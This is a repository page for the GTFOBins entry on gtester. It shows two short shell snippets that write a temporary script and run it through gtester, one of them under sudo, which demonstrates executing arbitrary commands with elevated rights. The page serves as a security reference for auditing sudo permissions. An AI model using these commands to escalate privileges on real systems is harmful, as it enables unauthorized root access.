This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
ee1093fc7bdf4e77a3dff8501a7894c8220d145f
GTFOBins.github.io
/
_gtfobins
/
gtester.md
bcoles
ee1093fc7b
Create gtester.md
2020-03-17 20:32:25 +01:00
331 B
Raw
Blame
History
functions
functions
command
sudo
code
TF=$(mktemp) echo '#!/bin/sh' > $TF echo '/usr/bin/id' >> $TF chmod +x $TF gtester -q $TF
code
TF=$(mktemp) echo '#!/bin/sh' > $TF echo '/usr/bin/id' >> $TF chmod +x $TF sudo gtester -q $TF
Reference in New Issue
View Git Blame
Copy Permalink